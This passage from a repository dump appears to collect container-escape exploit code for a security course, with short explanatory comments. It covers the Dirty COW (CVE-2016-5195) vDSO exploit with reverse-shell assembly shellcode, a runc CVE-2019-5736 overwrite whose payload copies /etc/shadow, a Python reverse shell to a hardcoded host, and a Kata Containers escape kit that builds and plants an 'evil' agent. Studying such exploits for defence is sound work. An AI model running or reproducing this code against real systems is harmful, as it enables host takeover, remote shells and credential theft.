return ret;
}
/*
* Apply vDSO patches in the correct order.
*
* During the backdoor step, the payload must be written before hijacking the
* function prologue. During the restore step, the prologue must be restored
* before removing the payload.
*/
static int exploit(struct mem_arg *arg, bool do_patch)
{
unsigned int i;
int ret;
ret = 0;
arg->do_patch = do_patch;
for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {
if (do_patch)
arg->patch_number = i;
else
arg->patch_number = ARRAY_SIZE(vdso_patch) - i - 1;
if (exploit_helper(arg) != 0) {
ret = -1;
break;
}
}
return ret;
}
static int create_socket(uint16_t port)
{
struct sockaddr_in addr;
int enable, s;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1) {
warn("socket");
return -1;
}
enable = 1;
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1)
warn("setsockopt(SO_REUSEADDR)");
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = port;
if (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
warn("failed to bind socket on port %d", ntohs(port));
close(s);
return -1;
}
if (listen(s, 1) == -1) {
warn("listen");
close(s);
return -1;
}
return s;
}
/* interact with reverse connect shell */
static int yeah(struct mem_arg *arg, int s)
{
struct sockaddr_in addr;
struct pollfd fds[2];
socklen_t addr_len;
char buf[4096];
nfds_t nfds;
int c, n;
fprintf(stderr, "[*] waiting for reverse connect shell...\n");
addr_len = sizeof(addr);
while (1) {
c = accept(s, (struct sockaddr *)&addr, &addr_len);
if (c == -1) {
if (errno == EINTR)
continue;
warn("accept");
return -1;
}
break;
}
close(s);
fprintf(stderr, "[*] enjoy!\n");
if (fork() == 0) {
if (exploit(arg, false) == -1)
fprintf(stderr, "[-] failed to restore vDSO\n");
exit(0);
}
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
fds[1].fd = c;
fds[1].events = POLLIN;
nfds = 2;
while (nfds > 0) {
if (poll(fds, nfds, -1) == -1) {
if (errno == EINTR)
continue;
warn("poll");
break;
}
if (fds[0].revents == POLLIN) {
n = read(STDIN_FILENO, buf, sizeof(buf));
if (n == -1) {
if (errno != EINTR) {
warn("read(STDIN_FILENO)");
break;
}
} else if (n == 0) {
break;
} else {
writeall(c, buf, n);
}
}
if (fds[1].revents == POLLIN) {
n = read(c, buf, sizeof(buf));
if (n == -1) {
if (errno != EINTR) {
warn("read(c)");
break;
}
} else if (n == 0) {
break;
} else {
writeall(STDOUT_FILENO, buf, n);
}
}
}
return 0;
}
static struct prologue *fingerprint_prologue(void *vdso_addr)
{
unsigned long clock_gettime_addr;
uint32_t clock_gettime_offset;
uint64_t entry_point;
struct prologue *p;
int i;
/* e_entry */
entry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18);
clock_gettime_offset = (uint32_t)entry_point & 0xfff;
clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;
for (i = 0; i < ARRAY_SIZE(prologues); i++) {
p = &prologues[i];
if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0)
return p;
}
return NULL;
}
/*
* 1.2.3.4:1337
*/
static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)
{
char *p;
int ret;
str = strdup(str);
if (str == NULL) {
warn("strdup");
return -1;
}
p = strchr(str, ':');
if (p != NULL && p[1] != '\x00') {
*p = '\x00';
*port = htons(atoi(p + 1));
}
ret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 0 : -1;
if (ret == -1)
warn("inet_aton(%s)", str);
free(str);
return ret;
}
int main(int argc, char *argv[])
{
struct prologue *prologue;
struct mem_arg arg;
uint16_t port;
uint32_t ip;
int s;
ip = htonl(PAYLOAD_IP);
port = htons(PAYLOAD_PORT);
if (argc > 1) {
if (parse_ip_port(argv[1], &ip, &port) != 0)
return EXIT_FAILURE;
}
fprintf(stderr, "[*] payload target: %s:%d\n",
inet_ntoa(*(struct in_addr *)&ip), ntohs(port));
arg.vdso_addr = get_vdso_addr();
if (arg.vdso_addr == NULL)
return EXIT_FAILURE;
prologue = fingerprint_prologue(arg.vdso_addr);
if (prologue == NULL) {
fprintf(stderr, "[-] this vDSO version isn't supported\n");
fprintf(stderr, " add first entry point instructions to prologues\n");
return EXIT_FAILURE;
}
if (patch_payload(prologue, ip, port) == -1)
return EXIT_FAILURE;
if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
return EXIT_FAILURE;
s = create_socket(port);
if (s == -1)
return EXIT_FAILURE;
if (exploit(&arg, true) == -1) {
fprintf(stderr, "exploit failed\n");
return EXIT_FAILURE;
}
yeah(&arg, s);
return EXIT_SUCCESS;
}
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile
================================================
CFLAGS := -Wall
LDFLAGS := -lpthread
all: 0xdeadbeef
0xdeadbeef: 0xdeadbeef.o
$(CC) -o $@ $^ $(LDFLAGS)
0xdeadbeef.o: 0xdeadbeef.c payload.h
$(CC) -o $@ -c $< $(CFLAGS)
payload.h: payload
xxd -i $^ $@
payload: payload.s
nasm -f bin -o $@ $^
clean:
rm -f *.o *.h 0xdeadbeef
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s
================================================
BITS 64
[SECTION .text]
global _start
SYS_OPEN equ 0x2
SYS_SOCKET equ 0x29
SYS_CONNECT equ 0x2a
SYS_DUP2 equ 0x21
SYS_FORK equ 0x39
SYS_EXECVE equ 0x3b
SYS_EXIT equ 0x3c
SYS_READLINK equ 0x59
SYS_GETUID equ 0x66
AF_INET equ 0x2
SOCK_STREAM equ 0x1
IP equ 0xdeadc0de ;; patched by 0xdeadbeef.c
PORT equ 0x1337 ;; patched by 0xdeadbeef.c
_start:
;; save registers
push rdi
push rsi
push rdx
push rcx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; return if getuid() != 0
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov rax, SYS_GETUID
syscall
test rax, rax
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; check if within a container (PROC_PID_INIT_INO = 0xEFFFFFFC)
;; return if $(readlink /proc/1/ns/pid) != "pid:[4026531836]"
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
call get_strings
lea rsi, [rsp-16]
mov rdx, 16 ; strlen("pid:[4026531836]")
mov rax, SYS_READLINK
syscall
cmp rax, rdx
jne return
add rdi, 15 ; "pid:[4026531836]"
mov rcx, rdx
repe cmpsb
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; return if open("/tmp/.x", O_CREAT|O_EXCL, x) == -1
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov rsi, 0x00782e2f706d742f
push rsi
mov rdi, rsp
mov rsi, 192
mov rax, SYS_OPEN
syscall
test rax, rax
pop rsi
js return
;; fork
mov rax, SYS_FORK
syscall
test rax, rax
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; reverse connect (https://www.exploit-db.com/exploits/35587/)
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; sockfd = socket(AF_INET, SOCK_STREAM, 0)
xor rsi, rsi ; 0 out rsi
mul esi ; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0)
inc rsi ; rsi = SOCK_STREAM
push AF_INET
pop rdi
add al, SYS_SOCKET
syscall
; copy socket descriptor to rdi for future use
push rax
pop rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = IP
; bzero(&server.sin_zero, 8)
push rdx
push rdx
mov dword [rsp + 0x4], IP
mov word [rsp + 0x2], PORT
mov byte [rsp], AF_INET
;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
push rsp
pop rsi
push 0x10
pop rdx
push SYS_CONNECT
pop rax
syscall
test rax, rax
js exit
;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STDERR)
xor rax, rax
push 0x3 ; loop down file descriptors for I/O
pop rsi
dup_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dup_loop
;; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
xor rax, rax
mov al, SYS_EXECVE
syscall
exit:
xor rax, rax
mov al, SYS_EXIT
syscall
return:
;; restore registers
pop rcx
pop rdx
pop rsi
pop rdi
;; get callee address (pushed on the stack by the call instruction)
pop rax
;; execute missed instructions (patched by 0xdeadbeef.c)
db 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
;; return to callee
jmp rax
get_strings:
lea rdi, [rel $ +8]
ret
db '/proc/1/ns/pid'
db 0
db 'pid:[4026531836]'
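The namespace gate above compares the symlink target of `/proc/1/ns/pid` against the fixed inode of the initial PID namespace (`PROC_PID_INIT_INO = 0xEFFFFFFC = 4026531836`) and bails out when they differ. The same check, sketched in Python (the helper name is illustrative, and a Linux `/proc` is assumed):

```python
import os

# PROC_PID_INIT_INO = 0xEFFFFFFC = 4026531836 is the fixed inode of the
# initial (host) PID namespace in the Linux kernel.
HOST_PID_NS = "pid:[4026531836]"

def in_host_pid_namespace(pid="1"):
    """True if the given process runs in the host's initial PID
    namespace; False if it is namespaced or the link is unreadable."""
    try:
        return os.readlink(f"/proc/{pid}/ns/pid") == HOST_PID_NS
    except OSError:
        return False
```

The shellcode is injected into code shared by both containerized and host processes, so this check lets the payload fire only in the intended context.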
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go
================================================
package main
// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
"fmt"
"io/ioutil"
"os"
"strconv"
"strings"
)
// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"
func main() {
// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd, err := os.Create("/bin/sh")
if err != nil {
fmt.Println(err)
return
}
fmt.Fprintln(fd, "#!/proc/self/exe")
err = fd.Close()
if err != nil {
fmt.Println(err)
return
}
fmt.Println("[+] Overwritten /bin/sh successfully")
// Loop through all processes to find one whose cmdline includes "runc"
// This will be the process created by runc
var found int
for found == 0 {
pids, err := ioutil.ReadDir("/proc")
if err != nil {
fmt.Println(err)
return
}
for _, f := range pids {
fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
fstring := string(fbytes)
if strings.Contains(fstring, "runc") {
fmt.Println("[+] Found the PID:", f.Name())
found, err = strconv.Atoi(f.Name())
if err != nil {
fmt.Println(err)
return
}
}
}
}
// We will use the pid to get a file handle for runc on the host.
var handleFd = -1
for handleFd == -1 {
// Note, you do not need to use the O_PATH flag for the exploit to work.
handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
if int(handle.Fd()) > 0 {
handleFd = int(handle.Fd())
}
}
fmt.Println("[+] Successfully got the file handle")
// Now that we have the file handle, let's write to the runc binary and overwrite it.
// It will maintain its executable flag
for {
writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
if int(writeHandle.Fd()) > 0 {
fmt.Println("[+] Successfully got write handle", writeHandle)
writeHandle.Write([]byte(payload))
return
}
}
}
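The discovery loop in main.go walks `/proc` and searches each process's cmdline for the string "runc". The same scan, sketched in Python (the helper name is illustrative):

```python
import os

def find_pids_by_cmdline(substring):
    """Scan /proc for processes whose cmdline contains `substring`,
    mirroring the discovery loop in main.go (which looks for "runc")."""
    pids = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue  # skip non-process entries such as /proc/meminfo
        try:
            # cmdline is NUL-separated; replace NULs for substring search
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
        except OSError:
            continue  # process already exited, or permission denied
        if substring in cmdline:
            pids.append(int(entry))
    return pids
```

In the exploit, the matching PID is then used to open `/proc/PID/exe`, which keeps a handle to the host's runc binary alive after the process exits.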
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c
================================================
#include <stdlib.h>
int main(void)
{
int *a = NULL;
*a = 1;
return 0;
}
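This PoC only triggers the crash; the escape relies on the host's `core_pattern` pointing at an attacker-controlled pipe handler, which the kernel then executes on the host when the dump occurs. A hedged Python helper (not part of the original PoC) to check for that precondition:

```python
def core_pattern_is_pipe(path="/proc/sys/kernel/core_pattern"):
    """True if core_pattern starts with "|", meaning the kernel pipes
    core dumps to a program executed in the host context -- the hook
    this PoC relies on when core_pattern is attacker-controlled."""
    try:
        with open(path) as f:
            return f.read().strip().startswith("|")
    except OSError:
        return False
```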
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py
================================================
import os
import pty
import socket
lhost = "172.17.0.1"  # change to match your environment
lport = 10000  # change to match your environment
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
os.remove('/tmp/.x.py')
s.close()
if __name__ == "__main__":
main()
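The connect-back and descriptor plumbing used by tmp-dot-x.py can be exercised safely on the loopback interface. A self-contained sketch (no shell is spawned; names are illustrative):

```python
import socket

def loopback_roundtrip(message=b"id\n"):
    # "Attacker" side: listen on an ephemeral loopback port, which
    # stands in for lhost/lport in tmp-dot-x.py.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    host, port = listener.getsockname()

    # "Victim" side: connect back, as s.connect((lhost, lport)) does.
    victim = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    victim.connect((host, port))
    attacker, _ = listener.accept()

    # After dup2() onto fds 0/1/2, shell I/O would flow over this socket.
    victim.sendall(message)
    received = b""
    while len(received) < len(message):
        chunk = attacker.recv(len(message) - len(received))
        if not chunk:
            break
        received += chunk
    for s in (victim, attacker, listener):
        s.close()
    return received
```

On the attacker side, the real script expects a plain listener such as `nc -lvp 10000` to be waiting before the payload runs.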
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/build.sh
================================================
#!/bin/bash
set -e -x
current_path=`pwd`
agent_path=$GOPATH/src/github.com/kata-containers/agent/
# build evil agent
cd $agent_path
git checkout -- .
git checkout 1.10.0
cp $current_path/evil_agent_src/* $agent_path
sed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile
make
cd -
cp $agent_path/kata-agent ./docker/evil-kata-agent
# build reverse shell
gcc -o ./docker/evil_bin evil_bin.c -static
docker build -t kata-malware-image:latest docker/
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh
================================================
#!/bin/bash
if [ "$1" = "kata" ]; then
cat << EOF > /etc/docker/daemon.json
{
"runtimes": {
"kata-runtime": {
"path": "/opt/kata/bin/kata-runtime"
},
"kata-clh": {
"path": "/opt/kata/bin/kata-clh"
},
"kata-qemu": {
"path": "/opt/kata/bin/kata-qemu"
}
},
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime
EOF
systemctl daemon-reload && systemctl restart docker
elif [ "$1" = "runc" ]; then
rm -f /etc/systemd/system/docker.service.d/kata-containers.conf
cat << EOF > /etc/docker/daemon.json
{
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
systemctl daemon-reload && systemctl restart docker
else
echo "Invalid container runtime."
fi
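For the "kata" branch, the heredoc above amounts to generating a JSON map of runtime names to binaries. The same configuration, built programmatically in Python (illustrative helper, not part of the repo):

```python
import json

def kata_daemon_json(kata_root="/opt/kata/bin"):
    """Build the /etc/docker/daemon.json content written by
    change_container_runtime.sh for the 'kata' case."""
    runtimes = {
        name: {"path": f"{kata_root}/{name}"}
        for name in ("kata-runtime", "kata-clh", "kata-qemu")
    }
    return json.dumps(
        {
            "runtimes": runtimes,
            "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"],
        },
        indent=4,
    )
```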
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh
================================================
#!/bin/bash
set -e -x
rm -f /usr/bin/kata*
rm -rf /etc/kata-containers
rm -rf /opt/kata
rm -f /etc/docker/daemon.json
rm -f /etc/systemd/system/docker.service.d/kata-containers.conf
systemctl daemon-reload && systemctl restart docker
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile
================================================
FROM ubuntu:latest
COPY bash /bash
COPY evil-kata-agent /evil-kata-agent
COPY attack.sh /attack.sh
# Since we're targeting /bin, let's put some fake binaries in the image
COPY evil_bin /ls
COPY evil_bin /ps
COPY evil_bin /rm
RUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash
ENTRYPOINT ["/attack.sh"]
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh
================================================
#!/bin/bash
set -e
echo -e "\t[+] In the evil container"
echo -e "\t[*] Searching for the device..."
found_clh_dev=false
for path in /sys/dev/block/* ; do
curr_target=$(readlink $path)
if [[ $curr_target == *"vda1"* ]]; then
dev=$(basename $path)
guest_fs_major=$(echo $dev | cut -f1 -d:)
guest_fs_minor=$(echo $dev | cut -f2 -d:)
found_clh_dev=true
break
fi
done
if [ "$found_clh_dev" = false ]; then
echo -e "\t[!] no vda1 device, not on CLH, shutting down..."
exit 1
fi
echo -e "\t[+] Device found"
echo -e "\t[*] Mknoding..."
mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor
echo -e "\t[+] Mknoded successfully"
# Ok we're on CLH, let's run the attack
echo -e "\t[*] Replacing the guest kata-agent..."
cmd_file=/tmp/debugfs_cmdfile
rm -rf $cmd_file
cat << EOF > $cmd_file
open -w /dev/guest_hd
cd /usr/bin
rm kata-agent
write /evil-kata-agent kata-agent
close -a
EOF
# Execute cmdfile
/sbin/debugfs -f $cmd_file
echo -e "\t[+] Done"
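attack.sh derives the device's major and minor numbers from the name of the matching `/sys/dev/block` entry, which has the form `MAJOR:MINOR`. The parsing and repacking can be sketched in Python (helper names are illustrative):

```python
import os

def parse_dev_numbers(name):
    """Split a /sys/dev/block entry name such as '254:1' into the
    (major, minor) pair that attack.sh passes to mknod."""
    major, minor = (int(x) for x in name.split(":"))
    return major, minor

def pack_dev(major, minor):
    """Pack the pair back into a dev_t, as the kernel does for the block
    node created by `mknod --mode 0600 /dev/guest_hd b MAJ MIN`."""
    return os.makedev(major, minor)
```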
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go
================================================
//
// Copyright (c) 2017-2019 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package main
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
"time"
gpb "github.com/gogo/protobuf/types"
"github.com/kata-containers/agent/pkg/types"
pb "github.com/kata-containers/agent/protocols/grpc"
"github.com/opencontainers/runc/libcontainer"
"github.com/opencontainers/runc/libcontainer/configs"
"github.com/opencontainers/runc/libcontainer/seccomp"
"github.com/opencontainers/runc/libcontainer/specconv"
"github.com/opencontainers/runc/libcontainer/utils"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/sirupsen/logrus"
"golang.org/x/net/context"
"golang.org/x/sys/unix"
"google.golang.org/grpc/codes"
grpcStatus "google.golang.org/grpc/status"
)
type agentGRPC struct {
sandbox *sandbox
version string
}
// CPU and Memory hotplug
const (
cpuRegexpPattern = "cpu[0-9]*"
memRegexpPattern = "memory[0-9]*"
libcontainerPath = "/run/libcontainer"
)
var (
sysfsCPUOnlinePath = "/sys/devices/system/cpu"
sysfsMemOnlinePath = "/sys/devices/system/memory"
sysfsMemoryBlockSizePath = "/sys/devices/system/memory/block_size_bytes"
sysfsMemoryHotplugProbePath = "/sys/devices/system/memory/probe"
sysfsConnectedCPUsPath = filepath.Join(sysfsCPUOnlinePath, "online")
containersRootfsPath = "/run"
// set when StartTracing() is called.
startTracingCalled = false
// set when StopTracing() is called.
stopTracingCalled = false
modprobePath = "/sbin/modprobe"
)
type onlineResource struct {
sysfsOnlinePath string
regexpPattern string
}
type cookie map[string]bool
var emptyResp = &gpb.Empty{}
const onlineCPUMemWaitTime = 100 * time.Millisecond
var onlineCPUMaxTries = uint32(100)
const cpusetMode = 0644
// handleError will log the specified error if wait is false
func handleError(wait bool, err error) error {
if !wait {
agentLog.WithError(err).Error()
}
return err
}
// Online resources, nbResources specifies the maximum number of resources to online.
// If nbResources is <= 0 then there is no limit and all resources are connected.
// Returns the number of resources connected.
func onlineResources(resource onlineResource, nbResources int32) (uint32, error) {
files, err := ioutil.ReadDir(resource.sysfsOnlinePath)
if err != nil {
return 0, err
}
var count uint32
for _, file := range files {
matched, err := regexp.MatchString(resource.regexpPattern, file.Name())
if err != nil {
return count, err
}
if !matched {
continue
}
onlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), "online")
status, err := ioutil.ReadFile(onlinePath)
if err != nil {
// resource cold plugged
continue
}
if strings.Trim(string(status), "\n\t ") == "0" {
if err := ioutil.WriteFile(onlinePath, []byte("1"), 0600); err != nil {
agentLog.WithField("online-path", onlinePath).WithError(err).Errorf("Could not online resource")
continue
}
count++
if nbResources > 0 && count == uint32(nbResources) {
return count, nil
}
}
}
return count, nil
}
func onlineCPUResources(nbCpus uint32) error {
resource := onlineResource{
sysfsOnlinePath: sysfsCPUOnlinePath,
regexpPattern: cpuRegexpPattern,
}
var count uint32
for i := uint32(0); i < onlineCPUMaxTries; i++ {
r, err := onlineResources(resource, int32(nbCpus-count))
if err != nil {
return err
}
count += r
if count == nbCpus {
return nil
}
time.Sleep(onlineCPUMemWaitTime)
}
return fmt.Errorf("only %d of %d were connected", count, nbCpus)
}
func onlineMemResources() error {
resource := onlineResource{
sysfsOnlinePath: sysfsMemOnlinePath,
regexpPattern: memRegexpPattern,
}
_, err := onlineResources(resource, -1)
return err
}
// updateCpusetPath updates a cpuset cgroup path: it visits each parent
// directory of cgroupPath, writing the maximal set of cpus to its
// cpuset.cpus file, and finally updates cgroupPath itself with the
// requested value.
// Cookies are used for performance reasons, so that a cgroup is not
// updated twice.
func updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error {
// Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs.
// Start updating from the cgroup system root.
cgroupParentPath := cgroupCpusetPath
cpusetGuest, err := getCpusetGuest()
if err != nil {
return err
}
// Update parents with the max set of current cpus.
// Iterate all parent dirs in order. This is needed to ensure each
// cgroup parent has the cpus needed by the request.
cgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), "/")
for _, path := range cgroupsParentPaths {
// Skip if empty.
if path == "" {
continue
}
cgroupParentPath = filepath.Join(cgroupParentPath, path)
// check if the cgroup was already updated.
if cookies[cgroupParentPath] {
agentLog.WithField("path", cgroupParentPath).Debug("cpuset cgroup already updated")
continue
}
cpusetCpusParentPath := filepath.Join(cgroupParentPath, "cpuset.cpus")
agentLog.WithField("path", cpusetCpusParentPath).Debug("updating cpuset parent cgroup")
if err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil {
return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusParentPath, cpusetGuest, err)
}
// add cgroup path to the cookies.
cookies[cgroupParentPath] = true
}
// Finally update group path with requested value.
cpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, "cpuset.cpus")
agentLog.WithField("path", cpusetCpusPath).Debug("updating cpuset cgroup")
if err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil {
return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusPath, cpusetGuest, err)
}
return nil
}
func (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error {
if req.NbCpus == 0 && req.CpuOnly {
return handleError(req.Wait, fmt.Errorf("requested number of CPUs '%d' must be greater than 0", req.NbCpus))
}
// we are going to update the containers of the sandbox, we have to lock it
a.sandbox.Lock()
defer a.sandbox.Unlock()
if req.NbCpus > 0 {
agentLog.WithField("vcpus-to-connect", req.NbCpus).Debug("connecting vCPUs")
if err := onlineCPUResources(req.NbCpus); err != nil {
return handleError(req.Wait, err)
}
}
if !req.CpuOnly {
if err := onlineMemResources(); err != nil {
return handleError(req.Wait, err)
}
}
// At this point all CPUs have been connected, we need to know
// the actual range of CPUs
connectedCpus, err := getCpusetGuest()
if err != nil {
return handleError(req.Wait, fmt.Errorf("Could not get the actual range of connected CPUs: %v", err))
}
agentLog.WithField("range-of-vcpus", connectedCpus).Debug("connecting vCPUs")
cookies := make(cookie)
// Now that we know the actual range of connected CPUs, we need to iterate over
// all containers and update each cpuset cgroup. This is not required in docker
// containers since they don't hot add/remove CPUs.
for _, c := range a.sandbox.containers {
agentLog.WithField("container", c.container.ID()).Debug("updating cpuset cgroup")
contConfig := c.container.Config()
cgroupPath := contConfig.Cgroups.Path
// In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents*
// MUST BE updated, otherwise we'll get next errors:
// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied
// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy
// NOTE: updating container cpuset cgroup *parents* won't affect the container cpuset cgroup. For example, if the container cpuset cgroup has "0"
// and its cpuset cgroup *parents* have "0-5", the container will still be able to use only CPU 0.
// Containers with an explicitly assigned cpuset are not updated; only their parents are.
if contConfig.Cgroups.Resources.CpusetCpus != "" {
agentLog.WithField("cpuset", contConfig.Cgroups.Resources.CpusetCpus).Debug("updating container cpuset cgroup parents")
// remove container cgroup directory
cgroupPath = filepath.Dir(cgroupPath)
}
if err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil {
return handleError(req.Wait, err)
}
}
return nil
}
func setConsoleCarriageReturn(fd int) error {
termios, err := unix.IoctlGetTermios(fd, unix.TCGETS)
if err != nil {
return err
}
termios.Oflag |= unix.ONLCR
return unix.IoctlSetTermios(fd, unix.TCSETS, termios)
}
func buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) {
user := agentProcess.User.Username
if user == "" {
// We can specify the user and the group separated by ":"
user = fmt.Sprintf("%d:%d", agentProcess.User.UID, agentProcess.User.GID)
}
additionalGids := []string{}
for _, gid := range agentProcess.User.AdditionalGids {
additionalGids = append(additionalGids, fmt.Sprintf("%d", gid))
}
proc := &process{
id: procID,
process: libcontainer.Process{
Cwd: agentProcess.Cwd,
Args: agentProcess.Args,
Env: agentProcess.Env,
User: user,
AdditionalGroups: additionalGids,
Init: init,
},
}
if agentProcess.Terminal {
parentSock, childSock, err := utils.NewSockPair("console")
if err != nil {
return nil, err
}
proc.process.ConsoleSocket = childSock
proc.consoleSock = parentSock
epoller, err := newEpoller()
if err != nil {
return nil, err
}
proc.epoller = epoller
return proc, nil
}
rStdin, wStdin, err := os.Pipe()
if err != nil {
return nil, err
}
rStdout, wStdout, err := os.Pipe()
if err != nil {
return nil, err
}
rStderr, wStderr, err := os.Pipe()
if err != nil {
return nil, err
}
proc.process.Stdin = rStdin
proc.process.Stdout = wStdout
proc.process.Stderr = wStderr
proc.stdin = wStdin
proc.stdout = rStdout
proc.stderr = rStderr
return proc, nil
}
func (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {
return &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil
}
func (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {
return &pb.VersionCheckResponse{
GrpcVersion: pb.APIVersion,
AgentVersion: a.version,
}, nil
}
func (a *agentGRPC) getContainer(cid string) (*container, error) {
if !a.sandbox.running {
return nil, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started")
}
ctr, err := a.sandbox.getContainer(cid)
if err != nil {
return nil, err
}
return ctr, nil
}
// Shared function between CreateContainer and ExecProcess, because those expect
// a process to be run.
func (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) {
if ctr == nil {
return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil")
}
if proc == nil {
return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil")
}
// This lock is very important to avoid any race with reaper.reap().
// Indeed, if we don't lock this here, we could potentially get the
